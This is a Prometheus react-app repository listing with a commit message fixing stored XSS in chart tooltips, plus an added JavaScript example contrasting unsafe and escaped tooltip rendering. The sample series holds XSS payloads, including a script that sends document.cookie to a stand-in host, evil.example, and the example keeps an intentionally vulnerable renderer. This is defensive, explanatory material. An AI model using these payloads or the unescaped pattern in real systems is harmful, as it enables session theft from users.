prometheus/web/ui/react-app
Julius Volz a4d5f98f42 UI: Fix stored XSS via unescaped metric names and labels
Metric names, label names, and label values containing HTML/JavaScript were
inserted into `innerHTML` without escaping in several UI code paths, enabling
stored XSS attacks via crafted metrics. This mostly becomes exploitable in
Prometheus 3.x, since it defaults to allowing any UTF-8 characters in metric
and label names.

Apply `escapeHTML()` to all user-controlled values before innerHTML
insertion in:

* Mantine UI chart tooltip
* Old React UI chart tooltip
* Old React UI metrics explorer fuzzy search
* Old React UI heatmap tooltip

See https://github.com/prometheus/prometheus/security/advisories/GHSA-vffh-x6r8-xx99

Signed-off-by: Julius Volz <julius.volz@gmail.com>
2026-04-04 12:19:55 +02:00
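The commit describes the bug class without showing it. The following is an added example, not code from Prometheus or from the commit above: a chart-tooltip renderer that splices a series' metric name and label values into an HTML string destined for `innerHTML`, first unescaped (the pattern the commit removes) and then with every user-controlled value passed through an `escapeHTML()` of the kind the commit applies. The series object and its hostile metric/label values are constructed for the demonstration; `renderTooltipUnsafe`, `renderTooltipSafe` and `containsLiveMarkup` are hypothetical names, not functions in the Prometheus UI.

```javascript
// Added example (not Prometheus code). Scraped metric names, label names and
// label values are attacker-controlled; Prometheus 3.x additionally allows any
// UTF-8 in metric and label names, so '<' and quotes can appear in the name
// itself, not only in label values.

// Escape the five characters that change meaning in HTML text and attribute
// contexts. '&' must be replaced first so already-produced entities are not
// re-escaped.
function escapeHTML(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Constructed sample series: the metric name carries an <img onerror> payload
// (possible because 3.x accepts UTF-8 names), and one label value breaks out of
// the attribute the tooltip puts it in and injects a <script>.
const hostileSeries = {
  metric: {
    __name__: 'up<img src=x onerror="alert(document.cookie)">',
    job: 'node"><script>fetch("https://evil.example/?c="+document.cookie)</script>',
    instance: 'host-1:9100',
  },
  value: 1,
};

// Vulnerable form: series data concatenated straight into the markup string.
// Assigning the result to element.innerHTML executes the injected handlers.
function renderTooltipUnsafe(series) {
  const labels = Object.entries(series.metric)
    .filter(([name]) => name !== '__name__')
    .map(([name, val]) => `${name}="${val}"`)
    .join(', ');
  return `<div class="tooltip"><b>${series.metric.__name__}</b>{${labels}} ${series.value}</div>`;
}

// Hardened form: metric name, label names, label values and the sample value
// are all escaped before they reach the string. The browser then renders the
// payload as literal text instead of parsing it as tags.
function renderTooltipSafe(series) {
  const labels = Object.entries(series.metric)
    .filter(([name]) => name !== '__name__')
    .map(([name, val]) => `${escapeHTML(name)}="${escapeHTML(val)}"`)
    .join(', ');
  return `<div class="tooltip"><b>${escapeHTML(series.metric.__name__)}</b>{${labels}} ${escapeHTML(series.value)}</div>`;
}

// Cheap regression check for the renderer output: a real <img> or <script>
// start tag surviving into the HTML string means a value was not escaped.
function containsLiveMarkup(html) {
  return /<(img|script)\b/i.test(html);
}

// Stand-alone run: compare both renderings without needing a DOM.
console.log('unsafe contains live markup:', containsLiveMarkup(renderTooltipUnsafe(hostileSeries)));
console.log('safe   contains live markup:', containsLiveMarkup(renderTooltipSafe(hostileSeries)));
console.log(renderTooltipSafe(hostileSeries));
```

Escaping at the point of string construction is the fix the commit takes; the alternative of building the tooltip with `textContent` on real DOM nodes avoids the question entirely, but for code paths that already assemble an HTML string, every interpolated value has to go through the escaper, including names, which older Prometheus versions constrained to a safe character set and 3.x does not.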
public fix some typos (#12498) 2023-06-29 12:28:13 +02:00
src UI: Fix stored XSS via unescaped metric names and labels 2026-04-04 12:19:55 +02:00
.env Fix broken prefixed asset links in webpack build (#9586) 2021-10-25 12:52:13 +02:00
.eslintrc.json Update React 16->17, TypeScript, and some other node deps 2021-09-14 15:46:59 +02:00
.gitignore Integrate beginning of React UI (#5694) 2019-10-17 14:38:09 +02:00
package-lock.json Migrate Mantine v7 -> v8 (#17402) 2025-11-06 09:38:27 +01:00
package.json Upgraded npm dependencies pre 3.4.0-rc.0 (#16493) 2025-04-29 17:19:23 +02:00
tsconfig.json upgrade react-app to typescript 4 2021-09-07 10:51:59 +02:00